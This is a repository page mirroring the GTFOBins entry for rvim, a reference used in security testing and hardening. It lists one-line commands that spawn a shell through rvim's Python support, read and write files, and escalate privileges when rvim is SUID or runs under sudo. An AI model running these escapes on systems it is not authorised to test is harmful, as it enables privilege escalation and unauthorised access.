This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-10-31 00:38:54 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
279381cf3c23877abde2436529ebdd4c92e9f1f0
GTFOBins.github.io
/
_gtfobins
/
rvim.md
Emilio Pinna
279381cf3c
Polish rvim, vi, and vim
2018-12-03 13:15:57 +00:00
644 B
Raw
Blame
History
functions
functions
shell
file-write
file-read
suid
sudo
description
code
This requires that rvim is compiled with Python support.
rvim -c ':py import os;os.system("sh")'
description
code
This requires that rvim is compiled with Python support.
rvim file_to_write iDATA ^[ w
code
rvim file_to_read
description
code
This requires that rvim is compiled with Python support.
./rvim -c ':py import os;os.system("sh")'
description
code
This requires that rvim is compiled with Python support.
sudo rvim -c ':py import os;os.system("sh")'
Reference in New Issue
View Git Blame
Copy Permalink